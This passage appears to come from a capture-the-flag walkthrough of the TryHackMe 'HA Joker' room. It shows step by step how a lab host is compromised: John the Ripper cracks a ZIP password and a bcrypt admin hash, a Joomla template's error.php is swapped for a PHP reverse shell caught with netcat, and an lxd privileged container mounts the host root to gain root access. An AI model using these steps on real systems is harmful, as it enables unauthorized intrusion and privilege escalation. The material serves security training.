Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:./password.lst
hannah           (backup.zip)
1g 0:00:00:00 DONE 2/3 (2020-06-23 10:16) 6.250g/s 584006p/s 584006c/s 584006C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Answer: hannah

#12 – Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

Unzipping the backup.zip archive reveals 2 folders: db and site, respectively with a sql dump of the database (2415 lines) and a copy of the website.

In the site directory we can find the Joomla configuration file, that contains the database’s password:

$ head -n20 configuration.php 
<?php
class JConfig {
    public $offline = '0';
    public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'joker';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla';
    public $password = '1234';
    public $db = 'joomladb';
    public $dbprefix = 'cc1gr_';
    public $live_site = '';

But since we don’t have access to the database currently, we are more interested in valid users to access the Joomla website.

Let’s search for the interesting table:

$ grep CREATE TABLE joomladb.sql | grep user
grep: TABLE: No such file or directory
joomladb.sql:CREATE TABLE `cc1gr_user_keys` (
joomladb.sql:CREATE TABLE `cc1gr_user_notes` (
joomladb.sql:CREATE TABLE `cc1gr_user_profiles` (
joomladb.sql:CREATE TABLE `cc1gr_user_usergroup_map` (
joomladb.sql:CREATE TABLE `cc1gr_usergroups` (
joomladb.sql:CREATE TABLE `cc1gr_users` (

And now that we know the table:

$ grep cc1gr_users joomladb.sql 
-- Table structure for table `cc1gr_users`
DROP TABLE IF EXISTS `cc1gr_users`;
CREATE TABLE `cc1gr_users` (
-- Dumping data for table `cc1gr_users`
LOCK TABLES `cc1gr_users` WRITE;
/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;

The “Super Duper User” is admin.

#13 – Super Duper User! What is the password?

Hint: Again, john and mysql hash password.

The hash of the admin’s password is $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG

Save it to admin.hash and crack it with John:

$ /data/src/john/run/john admin.hash --wordlist=/data/src/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234         (?)
1g 0:00:00:07 DONE (2020-06-23 10:30) 0.1259g/s 136.0p/s 136.0c/s 136.0C/s bullshit..brownie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is abcd1234.

#14 – At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?

Hint: Maybe use error.php page on a template? Of course try it and execute ‘id’ command.

We are now able to authenticate with admin:abcd1234 to the administration backend of Joomla. Let’s create a webshell.

From the Control Panel go to Configuration > Templates > Templates > Beez3 Details and Files. Click on error.php to edit the code and replace it with a PHP reverse shell.

Open a listener (rlwrap nc -nlvp 4444) and in your browser, visit the error page (http://10.10.130.207:8080/templates/beez3/error.php). You should now have a reverse shell.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.130.207.
Ncat: Connection from 10.10.130.207:42946.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 01:36:59 up  1:53,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$

Answer: www-data

#15 – This user belongs to a group that differs on your own group, What is this group?

Hint: Linux containers

We are member of the lxd group, which reveals the presence of a linux container:

www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)

Answer: lxd

#16 – Spawn a tty shell.

Hint: python3

You can do that as follows:

$ SHELL=/bin/bash script -q /dev/null

Or with python:

$ python3 -c "import pty;pty.spawn('/bin/bash')"

#17 – In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.

Read documentation about LXC / LXD: https://linuxcontainers.org/lxd/introduction/

#18 – List the image installed on the lxd-service, what is the ALIAS of this image?

Hint: lxc image ls

Now, let’s list the images installed:

www-data@ubuntu:/$ lxc image list
lxc image list
+-------+-------------+--------+-------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+------+------+-------------+

There is none. We are supposed to have a myalpine image. If you have an empty list, you can install it yourself.

First download the image on your machine:

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine

Transfer the resulting tar.gz file (e.g. alpine-v3.12-x86_64-20200623_1255.tar.gz) to the target.

Now, on the target, import the image.

www-data@ubuntu:/tmp$ lxc image import alpine-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
<-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
www-data@ubuntu:/tmp$ lxc image list
lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
|  ALIAS   | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |          UPLOAD DATE          |
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| myalpine | f3c94a02e9d8 | no     | alpine v3.12 (20200623_12:55) | x86_64 | 3.07MB | Jun 23, 2020 at 11:07am (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
www-data@ubuntu:/tmp$

Answer: myalpine

#19 – The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

Hint: lxc init … lxc config device … lxc start … lxc exec …

www-data@ubuntu:/tmp$ lxc init myalpine joker -c security.privileged=true
lxc init myalpine joker -c security.privileged=true
Creating joker
www-data@ubuntu:/tmp$ lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to joker
www-data@ubuntu:/tmp$ lxc start joker
lxc start joker
www-data@ubuntu:/tmp$ lxc exec joker /bin/sh
lxc exec joker /bin/sh
~ # id
id
uid=0(root) gid=0(root)

#20 – What is the name of the file in the /root directory?

Answer: final.txt

Author : https://www.aldeid.com/wiki/TryHackMe-HA-Joker-CTF